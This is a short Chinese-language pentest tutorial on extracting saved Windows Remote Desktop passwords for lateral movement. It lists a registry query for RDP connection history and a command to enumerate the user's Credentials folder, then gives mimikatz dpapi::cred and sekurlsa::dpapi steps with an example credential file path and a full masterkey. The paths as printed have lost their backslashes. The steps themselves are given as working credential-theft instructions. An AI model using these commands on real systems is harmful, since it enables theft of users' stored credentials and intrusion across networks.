Windows远程桌面(RDP)密码凭证获取

Windows远程桌面(RDP)
Windows自带的远程桌面功能非常强大,大部分Windows集群管理员都会直接使用远程桌面,所以如果我们获得了远程桌面的凭证,可以方便我们进行渗透测试中的横向移动。

查看连接记录

这里我们使用到了一个github开源的powershell脚本。
List-RDP-Connections-History: https://github.com/3gstudent/List-RDP-Connections-History

# 自动化脚本内部原理也就是帮我们把很多命令一次性自动执行,省去我们输入一大堆命令的烦恼,如果想要了解如何手动查看远程信息,可以查看其脚本源码,比如下面这行命令就能查看远程信息
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s

获取连接密码

这里我们需要用到猕猴桃,猕猴桃同样是一款开源程序。
猕猴桃下载地址: https://github.com/gentilkiwi/mimikatz/releases
注:只有用户保存密码后我们才可以通过这种手段获取。

# 获取连接目标名称
# 这条命令只能在cmd中执行!!! powershell无法使用
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
# 进入猕猴桃(确保当前已经cd到猕猴桃目录中)
.mimikatz.exe
# 在猕猴桃中输入(目录和目标名称均在第一条名字中,具体如下图所示)
dpapi::cred /in:目录目标名称
# 如
dpapi::cred /in:C:UsersxunmiAppDataLocalMicrosoftCredentialsFFFD74DD5481A8E2782922510413906A

当前我直接获取了解密凭据,如上图绿框中凭证。
如果你没有获得到解码凭证则需要手动携带Masterkey。如下

# 下列命令还需要在猕猴桃中执行
# 使用此命令寻找到需要的Masterkey
sekurlsa::dpapi
# 然后添加Masterkey后即可查看目标秘钥等信息
dpapi::cred /in:目录目标名称 /masterkey:主密钥
# 如
dpapi::cred /in:C:UsersxunmiAppDataLocalMicrosoftCredentialsFFFD74DD5481A8E2782922510413906A /masterkey:f490fdd81c83cc28e561b84294250571c2ff3410f1b6cf164700fbfcc2d54cfb042c859f720cd5848d9fb10d517155d83b6c5b4cfb9c9bb5554ae60b1bea9065